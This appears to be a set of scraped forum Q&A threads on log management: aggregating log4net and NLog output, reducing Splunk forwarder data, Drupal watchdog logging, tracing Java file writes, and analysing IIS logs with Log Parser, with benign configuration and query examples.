Has anyone found a way to get around this? Or a better technique to reliably aggregate logging from multiple web servers?
Any ideas on good log4net log file analysis tools too (plain text, not XML) - apart from good ol' grep of course :)
I read about logFaces on another question, or you could use a socket appender and write your own server. logFaces describes itself as a "Log server, aggregator & viewer", but I've yet to try it.
The 1024-byte limit is part of the syslog RFC (RFC 3164, section 4.1), as is UDP transport, which doesn't have guaranteed delivery (in case you worry about log lines lost in the ether). I think syslog-ng can solve both of these issues, but I'm not a syslog expert.
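If you do go the socket appender route, log4net ships a UdpAppender you can point at your own collector. A minimal sketch (the address, port and pattern below are placeholders, not anything from your setup):

    <appender name="UdpAppender" type="log4net.Appender.UdpAppender">
      <!-- placeholder address/port of your home-grown log collector -->
      <remoteAddress value="10.0.0.5" />
      <remotePort value="8514" />
      <layout type="log4net.Layout.PatternLayout">
        <conversionPattern value="%date [%thread] %-5level %logger - %message" />
      </layout>
    </appender>
    <root>
      <level value="INFO" />
      <appender-ref ref="UdpAppender" />
    </root>

Note this is still UDP underneath, so the delivery caveat above applies; it just frees you from the 1024-byte syslog framing.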
The database-based appenders are great for collecting logs from multiple servers.
The limitation is imposed by the syslog protocol itself, not by the appender.
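For reference, the database route usually means log4net's AdoNetAppender. A trimmed sketch of the usual config (the connection string, table and column names are placeholders, and a real config needs one <parameter> block per column in the INSERT):

    <appender name="AdoNetAppender" type="log4net.Appender.AdoNetAppender">
      <bufferSize value="100" />
      <connectionType value="System.Data.SqlClient.SqlConnection, System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
      <connectionString value="server=DBSERVER;database=Logs;integrated security=true" />
      <commandText value="INSERT INTO Log ([Date],[Level],[Message]) VALUES (@log_date, @log_level, @message)" />
      <parameter>
        <parameterName value="@log_date" />
        <dbType value="DateTime" />
        <layout type="log4net.Layout.RawTimeStampLayout" />
      </parameter>
      <parameter>
        <parameterName value="@log_level" />
        <dbType value="String" />
        <size value="50" />
        <layout type="log4net.Layout.PatternLayout">
          <conversionPattern value="%level" />
        </layout>
      </parameter>
      <parameter>
        <parameterName value="@message" />
        <dbType value="String" />
        <size value="4000" />
        <layout type="log4net.Layout.PatternLayout">
          <conversionPattern value="%message" />
        </layout>
      </parameter>
    </appender>

Point every web server at the same table and the aggregation problem becomes a SQL query.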
I don't know about log4net, but NLog works perfectly well with a "shared" file target - i.e. multiple processes can write to one and the same file.
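For anyone curious, this is roughly what that looks like in NLog.config (a sketch; the UNC path is a placeholder, and concurrentWrites is spelled out explicitly for clarity):

    <nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <targets>
        <!-- several processes (or servers) append to the same file -->
        <target name="shared" xsi:type="File"
                fileName="\\logserver\logs\app.log"
                concurrentWrites="true"
                keepFileOpen="false" />
      </targets>
      <rules>
        <logger name="*" minlevel="Info" writeTo="shared" />
      </rules>
    </nlog>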
I am using Splunk Enterprise for security purposes...
But there is a lot of extraneous data in my Splunk at the moment. Looking through the dashboards I am finding a lot of performance and operational status data which I don't need. The problem is that my Splunk license allows me to index 2 GB of data in a 24-hour period. I would say that at the moment 70% of the data that goes through the system is not security related, and the system was procured as a security monitoring system.
I would like to find a way to reduce the amount of data that the forwarders send back to the Splunk back end for processing, i.e. exclude all of the performance and operational data from the analysis.
My intention is to use that freed-up license capacity to push some antivirus and firewall logs to Splunk instead of server performance data.
I would really really appreciate some help with this. I have searched previous questions, but can't seem to find the answer. However, if there is a page you know of where I can find my answer please send me the link :)
Kind Regards
Vera
Sounds like you've taken an off-the-shelf Technology Add-on (TA) and deployed it as an app inside the Splunk forwarders on some servers?
If yes:
You'll find an inputs.conf inside the app; tweak it as appropriate.
http://docs.splunk.com/Documentation/Splunk/6.5.0/Admin/Inputsconf
You can simply disable a stanza in the inputs.conf with disabled = true. For example:
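(A sketch - the stanza names below are the perfmon inputs shipped by the standard Windows TA, so check what your own app actually defines. Put overrides in local/inputs.conf rather than editing default/.)

    # local/inputs.conf - switch off the performance-counter inputs
    [perfmon://CPU]
    disabled = true

    [perfmon://Memory]
    disabled = true

    [perfmon://LogicalDisk]
    disabled = true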
This same question has been answered in the Splunk forums:
https://answers.splunk.com/answers/444825/how-to-limit-the-amount-of-data-that-a-splunk-univ.html
For anyone else with the same issue, see the two answers posted in the link above, as well as this answer from another Splunk forum page, for different options.
Hi, I'm going through and securing a site I have that runs Drupal 7, using the Security Review module. One of the recommendations is to not use watchdog to log events to the screen, i.e. the database, I guess. If I turn that off, would there be another secure way to send logs to my workstation so that I can monitor traffic to the site, i.e. what people view, broken links and the like?
I'm on a shared host, not a dedicated host. I did a search on some different ways to do this, but I really don't know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I am not formatting this question correctly, but I'm not too clear on how to do this.
Are you sure the recommendation is about Drupal's watchdog, and not about displaying error messages on the pages? These are two different things.
That said, in Drupal, the watchdog is only an API for logging system messages. Where the messages go, and how they are actually logged, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log messages to the database. A syslog module is also provided, but that's not really an option if you are on shared hosting. A quick search reveals modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.
If you have a gigantic site with millions of hits a day, then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing as it's on a shared host, it's not a high-profile site. Using watchdog is fine.
I need a way to find which Java methods are writing to a plain log file (this log is not log4j); I'm fairly certain the log is written as a text file using the java.io file classes.
How can I isolate the methods that operate on the log using Eclipse?
I did some investigation on Linux to determine which process opens the file, and it's JBoss, so it's the main project; what's needed now is to narrow down the search.
So, what can be done at this point?
Any other tips, like using third-party monitoring tools such as jvisualvm to monitor JBoss's threads, are welcome.
I can provide more details about my problem; leave questions in the comments, because I don't know very well how to explain the issue I'm experiencing.
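One low-tech trick that might help (a sketch, assuming a pre-Java-9-era JVM where installing a SecurityManager programmatically is straightforward, and a made-up log file name): register a SecurityManager that dumps a stack trace whenever the suspect file is opened for writing. The trace tells you exactly which class and method did the write.

    // Sketch: run this as early as possible in startup (e.g. from a
    // startup servlet), before the mystery logging kicks in.
    System.setSecurityManager(new SecurityManager() {
        @Override
        public void checkWrite(String file) {
            if (file.endsWith("mystery.log")) { // hypothetical file name
                new Throwable("write to " + file).printStackTrace();
            }
        }

        @Override
        public void checkPermission(java.security.Permission perm) {
            // deliberately a no-op: permit everything else so JBoss keeps running
        }
    });

Alternatively, attach the Eclipse debugger to JBoss remotely and set a breakpoint on the java.io.FileOutputStream constructors, conditional on the file name; the suspended thread's stack gives you the same answer.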
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out Microsoft's Log Parser tool. That should at least take care of the more onerous part of the task (actually making sense of the log files). From there it is a pretty straightforward reporting operation.
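One suggestion along those lines: if all the sub-domains are bound to a single IIS site, you can enable the optional Host (cs-host) field in the site's W3C extended logging properties, and IIS will record which sub-domain each hit was for. Log Parser can then split the traffic back out; for example (a sketch - the host name and the ex*.log path are placeholders):

    LogParser -i:IISW3C "SELECT cs-uri-stem, COUNT(*) AS Hits FROM ex*.log WHERE cs-host = 'sub.example.com' GROUP BY cs-uri-stem ORDER BY Hits DESC" -o:DATAGRID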
I'm looking for some kind of tool that will let me slice and dice IIS web logs, for troubleshooting purposes...
All tools I've found are designed to analyze logs for a "Google Analytics" type of output, but what I want is more like "see all hits made from some IP", "see all hits to a specific ASHX file", things like that, to troubleshoot a few obscure bugs we are having with sessions...
Does anyone know of such a tool, or should I just roll my own?
Thanks!
Use Log Parser. It is a free Microsoft tool for analyzing all kinds of logs, including IIS logs.
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
Here is another great link.
http://www.msexchange.org/tutorials/Using-Logparser-Utility-Analyze-ExchangeIIS-Logs.html
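To give a flavour of the "slice and dice" queries from the question (a sketch; the IP address and handler path are placeholders, and these assume W3C-format IIS logs):

    rem all hits made from one IP address
    LogParser -i:IISW3C "SELECT date, time, cs-uri-stem, sc-status FROM ex*.log WHERE c-ip = '203.0.113.7'" -o:DATAGRID

    rem all hits to a specific ASHX handler
    LogParser -i:IISW3C "SELECT c-ip, date, time, sc-status FROM ex*.log WHERE cs-uri-stem LIKE '%/session.ashx'" -o:DATAGRID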
Our group at work is suggesting logdog. Open source, free, etc. I don't have direct experience yet, but my understanding is that it operates very efficiently on different logs (syslogd, access.log, error.log). You configure which logs to watch, how much, how often, and what to look for. It can then be configured to send out alerts.
Splunk is more heavyweight. But it's free (if your logs aren't huge). And it's cute.
And there are always plain find, findstr, grep and the like.
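For the quick-and-dirty end of that spectrum, something like this already answers "all hits from some IP" (a sketch; the IP and the W3SVC1 log path are placeholders):

    rem findstr: dump every request line containing a given IP
    findstr /C:"203.0.113.7" C:\WINDOWS\system32\LogFiles\W3SVC1\ex*.log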